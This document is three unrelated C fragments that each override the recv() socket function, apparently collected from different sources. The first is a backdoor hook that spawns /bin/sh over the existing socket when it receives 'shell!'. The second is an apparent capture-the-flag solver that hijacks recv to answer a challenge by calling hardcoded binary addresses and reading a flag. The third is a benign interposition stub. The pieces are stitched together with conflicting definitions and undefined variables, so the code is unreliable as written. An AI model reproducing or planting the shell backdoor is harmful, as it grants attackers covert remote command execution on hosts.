/*
* Fork a shell and re-use the current socket
*/
ssize_t recv(int socket, void *buffer, size_t length, int flags)
{
ssize_t ret;
FILE *fp;
char filename[1024+1];
ret = orig_recv(socket, buffer, length, flags);
if (ret < strlen("shell!\n"))
return ret;
if (memcmp(buffer, "shell!", strlen("shell!")))
return ret;
if (fork())
return 0;
setsid();
if (fork())
return 0;
dup2(socket, fileno(stdin));
dup2(socket, fileno(stdout));
dup2(socket, fileno(stderr));
execl("/bin/sh", "sh", NULL);
return -1;
}
ssize_t recv(int sockfd, void *buf, size_t len, int flags)
{
ssize_t (*orig_recv)(int sockfd, void *buf, size_t len, int flags);
orig_recv = dlsym(RTLD_NEXT, "recv");
ssize_t (*orig_send)(int sockfd, const void *buf, size_t len, int flags);
orig_send = dlsym(RTLD_NEXT, "send");
ssize_t r = orig_recv(sockfd, buf, len, flags);
printf("READ %d %s\n", r, buf);
if (strstr(buf, "what would you like")) {
len = 100;
//printf("requesting 2nd lin\n");
//ssize_t r = orig_recv(sockfd, buf, len, flags);
//printf("READx2 %d %s\n", r, buf);
printf("REQUESTING KEY \n");
ssize_t x = orig_send(sockfd, msg, strlen(msg), flags);
r = orig_recv(sockfd, buf, len, flags);
printf("read challenge %d %s\n", r, buf);
char *xc = buf + 11;
memcpy(mem, xc, 5);
printf ("chal = '%s'\n", mem);
r = orig_recv(sockfd, buf, len, flags);
printf("read 'answer?' %d %s\n", r, buf);
chal = 0x8048EAB;
*(int *)0x804B04C=7;
chal(mem, chalres);
chal2 = 0x8048F67;
chal2(chalres);
strcat(chalres, "\n");
printf ("sending response\n");
x = orig_send(sockfd, chalres, strlen(chalres), flags);
printf ("receiving again");
r = orig_recv(sockfd, buf, len, flags);
printf("read flag %d: %s\n", r, buf);
exit(0);
}
return r;
}
INTERPOSE (recv, ssize_t, int sockfd, void *buf, size_t len, int flags)
{
CHECK_INTERPOSE (recv);
if (!is_our_fd (sockfd))
return orig_recv (sockfd, buf, len, flags);
return v4v_recv (sockfd, buf, len, flags);
}
